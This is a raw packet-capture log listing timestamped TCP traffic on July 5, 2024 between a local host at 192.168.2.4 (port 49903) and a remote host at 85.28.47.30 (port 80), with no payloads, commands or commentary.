                                                                Jul 5, 2024 04:25:27.014518976 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.014547110 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.014601946 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.071549892 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.071604967 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.071620941 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.071665049 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.071692944 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.075381994 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.083323002 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.083333969 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.083343983 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.083395004 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.083405972 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.083410978 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.083410978 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.083483934 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.093627930 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.093661070 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.093671083 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.093693018 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.093761921 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.093767881 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.093779087 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.093792915 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.093839884 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.093839884 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.093852997 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.093894958 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.093904972 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.093916893 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.093981981 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.093982935 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.093993902 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.094003916 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.094016075 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.094028950 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.094052076 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.094099045 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.095056057 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.095113039 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.095123053 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.095140934 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.095165968 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.095175982 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.095185995 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.095211983 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.095259905 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.105274916 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.105330944 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.105349064 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.105355024 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.105360985 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.105382919 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.105407000 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.105478048 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.105482101 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.105494022 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.105504990 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.105521917 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.105523109 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.105551004 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.105560064 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.105575085 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.105575085 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.105628967 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.105658054 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.105671883 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.105683088 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.105694056 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.105705976 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.105721951 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.105726957 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.105732918 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.105746031 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.105782032 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.105782032 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.106277943 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.106317997 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.106328011 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.106358051 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.106384039 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.106415987 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.106435061 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.106451035 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.106463909 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.106473923 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.106484890 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.106508017 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.106564045 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.107327938 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.107338905 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.107350111 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.107368946 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.107374907 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.107378960 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.107388973 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.107399940 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.107414007 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.107466936 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.107476950 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.107477903 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.107671976 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.108211994 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.108248949 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.108267069 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.108273983 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.108278990 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.108293056 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.108318090 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.108376026 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.108438015 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.108448982 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.108460903 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.108472109 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.108566046 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.109114885 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.109184027 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.109194040 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.109206915 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.109210014 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.109220982 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.109236956 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.109252930 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.109301090 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.109303951 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.109312057 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.109323025 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.109369993 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.109369993 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.110065937 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.110217094 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.110227108 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.110238075 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.110302925 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.110302925 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.164896965 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.164906979 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.164916992 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.164963961 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.164975882 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.164987087 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.164994955 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.164994955 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.164998055 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.165028095 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.165102959 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.165239096 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.165280104 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.165290117 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.165448904 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.176058054 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.176078081 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.176086903 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.176101923 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.176147938 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.176160097 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.176184893 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.176189899 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.176201105 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.176269054 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.176271915 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.176279068 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.176289082 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.176379919 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.187467098 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.187513113 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.187524080 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.187578917 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.187588930 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.187598944 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.187637091 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.187666893 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.187676907 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.187678099 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.187689066 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.187706947 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.187719107 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.187730074 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.187736034 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.187736034 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.187741995 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.187764883 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.187798023 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.187959909 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.188013077 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.188024998 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.188077927 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.188086987 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.188098907 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.188102007 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.188168049 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.188175917 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.188179016 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.188188076 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.188199043 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.188224077 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.188226938 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.188236952 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.188247919 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.188251972 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.188292980 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.188925982 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.188936949 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.188946962 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.188988924 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.188998938 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.189008951 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.189012051 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.189023972 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.189069033 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.189069033 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.198468924 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.198522091 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.198585033 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.198595047 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.198606968 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.198628902 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.198641062 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.198653936 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.198678017 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.198751926 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.198757887 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.198765039 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.198776007 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.198786974 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.198806047 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.198812008 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.198821068 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.198832035 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.198836088 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.198853016 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.198863029 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.198880911 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.198940039 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.199064016 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199084044 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199139118 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199150085 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199188948 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199201107 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.199202061 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199227095 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.199234009 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199253082 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199259043 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.199265957 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199279070 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199281931 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.199290991 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199306011 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.199351072 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.199603081 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199613094 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199625969 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199672937 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199683905 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.199683905 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199696064 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199708939 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199755907 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199764013 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.199764013 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.199768066 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199779987 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199805975 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.199805975 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.199836016 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199846983 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199857950 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199868917 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.199871063 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.199898958 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.199939013 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.200673103 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.200685024 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.200702906 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.200721979 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.200733900 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.200746059 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.200757027 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.200759888 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.200768948 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.200782061 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.200797081 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.200807095 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.200889111 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.201087952 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.201141119 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.201153040 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.201164961 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.201172113 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.201236963 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.201248884 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.201308012 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.201308012 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.201330900 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.201349020 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.203433037 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.258593082 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.258662939 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.258672953 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.258677959 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.258682013 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.258722067 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.258733034 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.258740902 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.258743048 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.258836985 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.270133018 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.270195961 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.270224094 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.270235062 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.270246029 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.270262003 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.270272017 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.270303011 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.270313978 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.270333052 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.270344019 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.270354033 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.270365000 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.270394087 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.270412922 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.270422935 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.270425081 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.270436049 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.270447016 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.270462990 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.270462990 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.270505905 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.280885935 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.280910969 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.280920982 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.280949116 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.280971050 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.280981064 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.280991077 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.280999899 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.281037092 CEST4990380192.168.2.485.28.47.30
